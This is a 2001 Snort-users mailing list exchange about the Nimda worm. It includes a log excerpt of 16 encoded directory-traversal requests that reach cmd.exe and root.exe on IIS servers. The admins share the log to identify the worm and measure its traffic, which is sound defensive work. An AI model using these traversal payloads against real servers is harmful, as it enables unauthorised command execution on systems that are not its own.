Snort mailing list archives

RE: Not CodeGreen

From: "Ginnetty, James" <JGinnetty () skandia com>
Date: Tue, 18 Sep 2001 16:22:54 -0400
Definitely not our friend code red. Our log files are showing just how
pervasive this thing is. Looks like it will try 16 different exploit strings
in an attempt to infect another server before moving on to the next IP. Here
is a sorted cut from one of the logs. It is repeated many times over from
different IP's. No wonder the level of traffic....

  Jim

14:00:43        198.146.11.167  GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET     /c/winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET     /d/winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET     /MSADC/root.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44        198.146.11.167  GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
14:00:43        198.146.11.167  GET     /scripts/root.exe?/c+dir

-----Original Message-----
From: bthaler () webstream net [mailto:bthaler () webstream net]
Sent: Tuesday, September 18, 2001 3:43 PM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Not CodeGreen


For everyone's information:

The inordinate amount of traffic you're most likely seeing today is almost
surely NOT CodeGreen.

CodeGreed was developed as a way to patch server infected with CodeRed.
What you are most likely
seeing is in fact "nimda" which by all accounts seems like the last 3 or 4
big IIS exploits
(CodeRed, Unicode, et all) rolled up into one big exploit.

Again, this is most likely NOT CodeGreen, even though some have referred to
it as that.

BTW, my Snort-1.7MySQL database has surpassed 1,000,000 records just today,
and is still going
strong.  Hows that for scaleability, baby?

I run Snort-Win32 on one NT SMP machine, and the database from another
machine, so the load gets
balanced.

Hats off to Martin R, et all.

Regards,
Brad T.


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:

Not CodeGreen bthaler (Sep 18)
- <Possible follow-ups>
- RE: Not CodeGreen Ginnetty, James (Sep 18)